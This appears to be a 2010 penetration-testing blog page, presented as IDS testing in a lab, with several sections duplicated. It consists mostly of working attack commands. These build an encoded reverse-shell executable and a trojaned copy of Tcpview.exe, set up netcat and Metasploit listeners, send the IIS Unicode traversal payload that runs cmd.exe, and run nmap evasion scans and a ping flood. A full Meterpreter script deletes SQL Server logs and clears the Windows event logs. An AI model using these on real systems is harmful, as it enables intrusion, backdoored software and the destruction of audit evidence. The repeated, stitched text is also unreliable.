Here is my sample report which can be used for Vulnerability Analysis and Pen-Test.
Download Sample Report (VA-PT)
Tuesday, May 11, 2010
Monday, May 10, 2010
Download External Meterpreter Scripts and Tool
ifconfig eth1 up
ifconfig eth1 192.168.1.x/24
route add default gw 192.168.1.x
cd /pentest/exploits/framework3/scripts/meterpreter
wget http://www.darkoperator.com/meterpreter/disable_audit.rb
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb
cd /pentest/exploits/framework3/plugins
wget http://www.room362.com/scripts-and-programs/metasploit/mini-3.3-dev.exe
ifconfig eth1 192.168.1.x/24
route add default gw 192.168.1.x
cd /pentest/exploits/framework3/scripts/meterpreter
wget http://www.darkoperator.com/meterpreter/disable_audit.rb
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb
cd /pentest/exploits/framework3/plugins
wget http://www.room362.com/scripts-and-programs/metasploit/mini-3.3-dev.exe
Testing IDS with Encoded Payload
Step 1: On TEST-BT4, create an Encoded EXE Payload
./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe
Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2
Step 3: On TEST-BT4, launch Netcat in Listening Mode
nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole
msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Step 4: ON DEN-WEB2, launch the Encoded EXE Payload (payload.exe)
You should see, a reverse connection from DEN-WEB2 to TEST-BT4
Advanced Topic: Embedding Legitimate Program with Encoded Payload (Reverse TCP Shell Backdoor)
Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe
./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe
Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2
Step 3: On TEST-BT4, launch Netcat in Listening Mode
nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole
msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Step 4: ON DEN-WEB2, launch the Encoded EXE Payload (payload.exe)
You should see, a reverse connection from DEN-WEB2 to TEST-BT4
Advanced Topic: Embedding Legitimate Program with Encoded Payload (Reverse TCP Shell Backdoor)
Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe
./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
Testing IDS with Sample Attacks
Port Scanning
Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254
Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak
IIS Unicode Directory Traversal Exploit Test
Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
press Enter
press Enter
Snort: (http_inspect) DOUBLE DECODING ATTACK
Category: unclassified
Apache Directory Access Test
Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter
press Enter
Snort: WEB-MISC .htaccess access
Category: attempted-recon
Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
press Enter
press Enter
Snort: WEB-MISC robots.txt access
Category: web-application-activity
Ping Flood (Simple DoS Attack)
Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)
Snort: ICMP L3retriever Ping
Category: attempted-recon
IDS Evasion Attack
Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254
Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254
Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak
IIS Unicode Directory Traversal Exploit Test
Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Category: unclassified
Apache Directory Access Test
Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter
Category: attempted-recon
Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
Category: web-application-activity
Ping Flood (Simple DoS Attack)
Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)
Snort: ICMP L3retriever Ping
Category: attempted-recon
IDS Evasion Attack
Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254
Installing Nessus on BackTrack and Ubuntu Desktop
Step 1: Download from http://www.nessus.org and Install Nessus
Filename: Nessus-4.2.2-ubuntu810_i386.deb
Save in /tmp/ directory
Installing Nessus with Debian Package Manager
cd /tmp
dpkg -i Nessus-4.2.2-ubuntu810_i386.deb
Step 2: Add Nessus User
cd /opt/nessus/sbin
./nessus-adduser
Step 3: Register Nessus and Download All Plugins
Visit http://www.nessus.org/plugins/?view=homefeed
Register with your email address.
Open your email and get the registration/serial number.
cd /opt/nessus/bin
./nessus-fetch --register serial_number
Example:
./nessus-fetch --register 2B92-597B-2D44-C737-2309
Step 4: Launch Nessus Server and Apply All Plugins
cd /opt/nessus/sbin
./nessus-service
or
/etc/init.d/nessusd start
Step 5: Launch Nessus Client
https://localhost:8834/
Step 6: Update Plugins
cd /opt/nessus/sbin
./nessus-update-plugins
Nessus Plugins located at: /opt/nessus/lib/nessus/plugins
Filename: Nessus-4.2.2-ubuntu810_i386.deb
Save in /tmp/ directory
Installing Nessus with Debian Package Manager
cd /tmp
dpkg -i Nessus-4.2.2-ubuntu810_i386.deb
Step 2: Add Nessus User
cd /opt/nessus/sbin
./nessus-adduser
Step 3: Register Nessus and Download All Plugins
Visit http://www.nessus.org/plugins/?view=homefeed
Register with your email address.
Open your email and get the registration/serial number.
cd /opt/nessus/bin
./nessus-fetch --register serial_number
./nessus-fetch --register 2B92-597B-2D44-C737-2309
cd /opt/nessus/sbin
./nessus-service
or
/etc/init.d/nessusd start
Step 5: Launch Nessus Client
https://localhost:8834/
Step 6: Update Plugins
cd /opt/nessus/sbin
./nessus-update-plugins
Nessus Plugins located at: /opt/nessus/lib/nessus/plugins
Friday, April 9, 2010
SQL Log Clear
Example of an MSSQL Log Clear (mssqlclear.rb)
#MSSQL Log Clear
def list_exec(session,cmdlst)
print_status("Running Command List ...")
r=''
session.response_timeout=120
cmdlst.each do |cmd|
begin
print_status "running command #{cmd}"
r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
print_status("#{d}")
end
r.channel.close
r.close
rescue ::Exception => e
print_error("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
end
commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
'Net START "SQL Server (SQLEXPRESS)"']
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
print_status("Clearing Event Logs, this will leave and event 517")
begin
evtlogs.each do |evl|
print_status("Clearing the #{evl} Event Log")
log = session.sys.eventlog.open(evl)
log.clear
end
print_status("All Event Logs have been cleared")
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")
end
end
list_exec(client,commands)
clrevtlgs(client)
#MSSQL Log Clear
def list_exec(session,cmdlst)
print_status("Running Command List ...")
r=''
session.response_timeout=120
cmdlst.each do |cmd|
begin
print_status "running command #{cmd}"
r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
print_status("#{d}")
end
r.channel.close
r.close
rescue ::Exception => e
print_error("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
end
commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
'Net START "SQL Server (SQLEXPRESS)"']
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
print_status("Clearing Event Logs, this will leave and event 517")
begin
evtlogs.each do |evl|
print_status("Clearing the #{evl} Event Log")
log = session.sys.eventlog.open(evl)
log.clear
end
print_status("All Event Logs have been cleared")
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")
end
end
list_exec(client,commands)
clrevtlgs(client)
Tuesday, April 6, 2010
Subscribe to:
Posts (Atom)

